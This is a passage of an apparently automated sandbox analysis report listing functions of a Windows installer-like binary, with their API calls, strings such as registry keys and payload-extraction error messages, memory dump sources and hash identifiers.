                                                                                                                                                                    • String ID: `<u$atomutil.cpp
                                                                                                                                                                    • API String ID: 2724874077-4051019476
                                                                                                                                                                    • Opcode ID: 1d98e6a5270638c41bee89d2bf66d0b52bde434ec7884ff39bedbeda471d9e5d
                                                                                                                                                                    • Instruction ID: 483dc8c4befb33f6aa749faa735538468d49d8f118a6067a55bc4523c7f481c3
                                                                                                                                                                    • Opcode Fuzzy Hash: 1d98e6a5270638c41bee89d2bf66d0b52bde434ec7884ff39bedbeda471d9e5d
                                                                                                                                                                    • Instruction Fuzzy Hash: 8E518E7190422EEFCB25DBA4C884FAEF7B9AF44711F114594E945AB250DB71EE00CBA0
                                                                                                                                                                    Function 00941217 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 150registrystringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 0094123F
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,009170E8,00000100,000000B0,00000088,00000410,000002C0), ref: 00941276
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000,?,-00000001,00000004,00000000), ref: 0094136E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue$lstrlen
                                                                                                                                                                    • String ID: BundleUpgradeCode$regutil.cpp
                                                                                                                                                                    • API String ID: 3790715954-1648651458
                                                                                                                                                                    • Opcode ID: 538332051324992f9b7c973540004e3d907987fe01c6f974946b260a240c4360
                                                                                                                                                                    • Instruction ID: 4dd0bb61bf174ab0ac7c6bd659aad53119ebd41cd3e548fb1fdbfa042c6395ab
                                                                                                                                                                    • Opcode Fuzzy Hash: 538332051324992f9b7c973540004e3d907987fe01c6f974946b260a240c4360
                                                                                                                                                                    • Instruction Fuzzy Hash: 6441BF36A0022AEFDB21DF95C884EAEB7ADEF44714F15416AFD01EB640D6709D80DBA0
                                                                                                                                                                    Function 00946357 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0094490D: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,00918770,00000000,00000000,00000000,00000000,00000000), ref: 00944925
                                                                                                                                                                      • Part of subcall function 0094490D: GetLastError.KERNEL32(?,?,?,00918770,00000000,00000000,00000000,00000000,00000000), ref: 0094492F
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00945C09,?,?,?,?,?,?,?,00010000,?), ref: 009463C0
                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,00945C09,?,?,?,?), ref: 00946412
                                                                                                                                                                    • GetLastError.KERNEL32(?,00945C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 00946458
                                                                                                                                                                    • GetLastError.KERNEL32(?,00945C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 0094647E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLast$Write$Pointer
                                                                                                                                                                    • String ID: dlutil.cpp
                                                                                                                                                                    • API String ID: 133221148-2067379296
                                                                                                                                                                    • Opcode ID: 7bb58964863f01626a203ecfe7b83a6f6b56c47116643b4b07df30ca25ad03cf
                                                                                                                                                                    • Instruction ID: 32e0046c5bc2da87471e56529bf320f0a78b52b01f071c3a825529c2a4f7b571
                                                                                                                                                                    • Opcode Fuzzy Hash: 7bb58964863f01626a203ecfe7b83a6f6b56c47116643b4b07df30ca25ad03cf
                                                                                                                                                                    • Instruction Fuzzy Hash: 8A41A0B290021ABFEF218E94CD45FAA7B69EF05765F154225FD00A61A0D371DD20DBA2
                                                                                                                                                                    Function 00902428 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,0093FFEF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0093FFEF,009212CF,?,00000000), ref: 0090246E
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0093FFEF,009212CF,?,00000000,0000FDE9,?,009212CF), ref: 0090247A
                                                                                                                                                                      • Part of subcall function 00903BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,009021CC,000001C7,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903BDB
                                                                                                                                                                      • Part of subcall function 00903BD3: HeapSize.KERNEL32(00000000,?,009021CC,000001C7,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903BE2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                                                    • String ID: strutil.cpp
                                                                                                                                                                    • API String ID: 3662877508-3612885251
                                                                                                                                                                    • Opcode ID: 08a4b4788ae1662bf445e8c8b32814b5697ebae0341c41e077cb6d02adc342a3
                                                                                                                                                                    • Instruction ID: b8a5351d53362f4526dacbc3b0fa32b7abdb2b6d40f91f53abd815bc395fafa9
                                                                                                                                                                    • Opcode Fuzzy Hash: 08a4b4788ae1662bf445e8c8b32814b5697ebae0341c41e077cb6d02adc342a3
                                                                                                                                                                    • Instruction Fuzzy Hash: 6A31D23130421AEFEB119F698CD8A7637DDEB553A8B208629FE159B2E0E775CC019760
                                                                                                                                                                    Function 0092AD44 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 107COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,?,000000FF,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 0092ADB3
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to extract payload: %ls from container: %ls, xrefs: 0092AE3E
                                                                                                                                                                    • Failed to extract all payloads from container: %ls, xrefs: 0092ADF7
                                                                                                                                                                    • Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 0092AE4A
                                                                                                                                                                    • Failed to open container: %ls., xrefs: 0092AD85
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
                                                                                                                                                                    • API String ID: 1825529933-3891707333
                                                                                                                                                                    • Opcode ID: 69cda61fa506720e3ea3030f4f064592856cb8365d735ac3c3c468c61e2a73a2
                                                                                                                                                                    • Instruction ID: 2a86f0d04766fff6513986d3d2d738366aff3c1cd77576b7ac2bd01c6190d2d8
                                                                                                                                                                    • Opcode Fuzzy Hash: 69cda61fa506720e3ea3030f4f064592856cb8365d735ac3c3c468c61e2a73a2
                                                                                                                                                                    • Instruction Fuzzy Hash: 3E31E273C00129EFCF21AAE4DC46F9E7768AF44721F214611FE20A71D5E7319A15DBA2
                                                                                                                                                                    Function 00947A10 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00947AF4
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00947AFF
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00947B0A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeString$Heap$AllocateProcess
                                                                                                                                                                    • String ID: `<u$atomutil.cpp
                                                                                                                                                                    • API String ID: 2724874077-4051019476
                                                                                                                                                                    • Opcode ID: 252b6366bb4ef413eeff65f2879a6cceb1005ab15c4216db3665de883d5c16ec
                                                                                                                                                                    • Instruction ID: 1e991bd9fe6ad6dd526033650efdca20e8efb49e315151dedaaa117666eea709
                                                                                                                                                                    • Opcode Fuzzy Hash: 252b6366bb4ef413eeff65f2879a6cceb1005ab15c4216db3665de883d5c16ec
                                                                                                                                                                    • Instruction Fuzzy Hash: C0318032D1912DBBCB229BE4CC45F9EFBADEF44750F1141A1E900AB250DB70DE049B90
                                                                                                                                                                    Function 0090F005 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 96registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,00910654,00000001,00000001,00000001,00910654,00000000), ref: 0090F07D
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,00910654,00000001,00000001,00000001,00910654,00000000,00000001,00000000,?,00910654,00000001), ref: 0090F09A
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to format key for update registration., xrefs: 0090F033
                                                                                                                                                                    • Failed to remove update registration key: %ls, xrefs: 0090F0C7
                                                                                                                                                                    • PackageVersion, xrefs: 0090F05E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCompareString
                                                                                                                                                                    • String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
                                                                                                                                                                    • API String ID: 446873843-3222553582
                                                                                                                                                                    • Opcode ID: d020710c30baf2241b327896b9c05eee5201a289412a936891d50b9c7d3c7896
                                                                                                                                                                    • Instruction ID: 217289deda3a131c74e2b4b65df2bb8be32a8c467c6ac6d10dc6083a3b27d27d
                                                                                                                                                                    • Opcode Fuzzy Hash: d020710c30baf2241b327896b9c05eee5201a289412a936891d50b9c7d3c7896
                                                                                                                                                                    • Instruction Fuzzy Hash: 69218031900229BFDB31ABA5CC09FAEBAB8DF85720F100265FD14A2592E7719A40D790
                                                                                                                                                                    Function 0094433D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00944440: FindFirstFileW.KERNEL32(0092923A,?,00000100,00000000,00000000), ref: 0094447B
                                                                                                                                                                      • Part of subcall function 00944440: FindClose.KERNEL32(00000000), ref: 00944487
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 00944430
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                      • Part of subcall function 00941217: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 0094123F
                                                                                                                                                                      • Part of subcall function 00941217: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,009170E8,00000100,000000B0,00000088,00000410,000002C0), ref: 00941276
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseFindQueryValue$FileFirstOpen
                                                                                                                                                                    • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
                                                                                                                                                                    • API String ID: 3397690329-3978359083
                                                                                                                                                                    • Opcode ID: 804f8cfc74d228be9049e9aecb1a726e26e8207062996a32105172975ac85fc6
                                                                                                                                                                    • Instruction ID: f72483ebf13e9c65abcc0b10a2f516f661e9d0c16c9c17f3089f5323cb0022cf
                                                                                                                                                                    • Opcode Fuzzy Hash: 804f8cfc74d228be9049e9aecb1a726e26e8207062996a32105172975ac85fc6
                                                                                                                                                                    • Instruction Fuzzy Hash: 6331AE32A00219EBDF20AF91CC45FBEB7B9EF40B55F54817AE904A6161E3319E80DB90
                                                                                                                                                                    Function 00944019 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CopyFileW.KERNEL32(00000000,00904DBC,00000000,?,?,00000000,?,0094412D,00000000,00904DBC,00000000,00000000,?,009185EE,?,?), ref: 00944033
                                                                                                                                                                    • GetLastError.KERNEL32(?,0094412D,00000000,00904DBC,00000000,00000000,?,009185EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 00944041
                                                                                                                                                                    • CopyFileW.KERNEL32(00000000,00904DBC,00000000,00904DBC,00000000,?,0094412D,00000000,00904DBC,00000000,00000000,?,009185EE,?,?,00000001), ref: 009440AC
                                                                                                                                                                    • GetLastError.KERNEL32(?,0094412D,00000000,00904DBC,00000000,00000000,?,009185EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 009440B6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CopyErrorFileLast
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 374144340-2967768451
                                                                                                                                                                    • Opcode ID: c01f4a5cb7e1777d1e68e301a3a764402d08c8cf4c38a332da47828d5b663218
                                                                                                                                                                    • Instruction ID: 3d415dad84a49a94d4e7a6fb7b7acbc03da880df864093561847cfb9ce649e8b
                                                                                                                                                                    • Opcode Fuzzy Hash: c01f4a5cb7e1777d1e68e301a3a764402d08c8cf4c38a332da47828d5b663218
                                                                                                                                                                    • Instruction Fuzzy Hash: 5321F3366053369BEB300AAA4C40F3B679CEF55BA5B150536FF04DB151E7E5CC6092E1
                                                                                                                                                                    Function 0090EF1B Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 0090EF56
                                                                                                                                                                      • Part of subcall function 00944153: SetFileAttributesW.KERNEL32(0092923A,00000080,00000000,0092923A,000000FF,00000000,?,?,0092923A), ref: 00944182
                                                                                                                                                                      • Part of subcall function 00944153: GetLastError.KERNEL32(?,?,0092923A), ref: 0094418C
                                                                                                                                                                      • Part of subcall function 00903C6B: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,0090EFA1,00000001,00000000,00000095,00000001,00910663,00000095,00000000,swidtag,00000001), ref: 00903C88
                                                                                                                                                                    Strings
                                                                                                                                                                    • swidtag, xrefs: 0090EF65
                                                                                                                                                                    • Failed to format tag folder path., xrefs: 0090EFC3
                                                                                                                                                                    • Failed to allocate regid file path., xrefs: 0090EFB5
                                                                                                                                                                    • Failed to allocate regid folder path., xrefs: 0090EFBC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesDirectoryErrorFileLastOpen@16Remove
                                                                                                                                                                    • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
                                                                                                                                                                    • API String ID: 1428973842-4170906717
                                                                                                                                                                    • Opcode ID: cdcb987bad19793d721e3233fdb2db0935d49b1c5f7d54ebab1d00693780416f
                                                                                                                                                                    • Instruction ID: 8d9f0c5d41eeeb0cdaaed78733c7695591c5bb5fa9b463cba3eafa053d577e81
                                                                                                                                                                    • Opcode Fuzzy Hash: cdcb987bad19793d721e3233fdb2db0935d49b1c5f7d54ebab1d00693780416f
                                                                                                                                                                    • Instruction Fuzzy Hash: E6219831D04529BFCB15EB99CC01B9DFBB9EF84310F1184A5FA18AA2E1D7319E40EB90
                                                                                                                                                                    Function 00928DB6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                    • CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 00928E3A
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,0090F7E0,00000001,00000100,000001B4,00000000), ref: 00928E88
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to open uninstall registry key., xrefs: 00928DFD
                                                                                                                                                                    • Failed to enumerate uninstall key for related bundles., xrefs: 00928E99
                                                                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00928DD7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCompareOpenString
                                                                                                                                                                    • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                    • API String ID: 2817536665-2531018330
                                                                                                                                                                    • Opcode ID: f4dbb9340672f1550e50be4adb18b4b351837c60751f639fe60e89d5a4b8f811
                                                                                                                                                                    • Instruction ID: 759bb3cd525936a9237a41e6baac96ef42ee82b225ce7d45630b48758ec9c38e
                                                                                                                                                                    • Opcode Fuzzy Hash: f4dbb9340672f1550e50be4adb18b4b351837c60751f639fe60e89d5a4b8f811
                                                                                                                                                                    • Instruction Fuzzy Hash: D621F936901238FFDB21BA94DC4AFAFBA7DEB40721F114564F91076064DB354E50E790
                                                                                                                                                                    Function 0092D259 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0092D2EE
                                                                                                                                                                    • ReleaseMutex.KERNEL32(?), ref: 0092D31C
                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 0092D325
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                                                                                                                                    • String ID: Failed to allocate buffer.$NetFxChainer.cpp
                                                                                                                                                                    • API String ID: 944053411-3611226795
                                                                                                                                                                    • Opcode ID: d91b0da85f18a2856e1c489929a815504c200341f5f72953a40074ae1a1133d8
                                                                                                                                                                    • Instruction ID: c3b3f9c0c8a0659307c5e2deef886e0d3a4e31b067210eaa7efb9c780ca1de84
                                                                                                                                                                    • Opcode Fuzzy Hash: d91b0da85f18a2856e1c489929a815504c200341f5f72953a40074ae1a1133d8
                                                                                                                                                                    • Instruction Fuzzy Hash: BA21A3B4604206FFDB109F68D884A59B7F9FF88324F108669F964A7291C7B1E950CB90
                                                                                                                                                                    Function 00945907 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,00926B11,00000000,?), ref: 0094591D
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00926B11,00000000,?,?,?,?,?,?,?,?,?,00926F28,?,?), ref: 0094592B
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
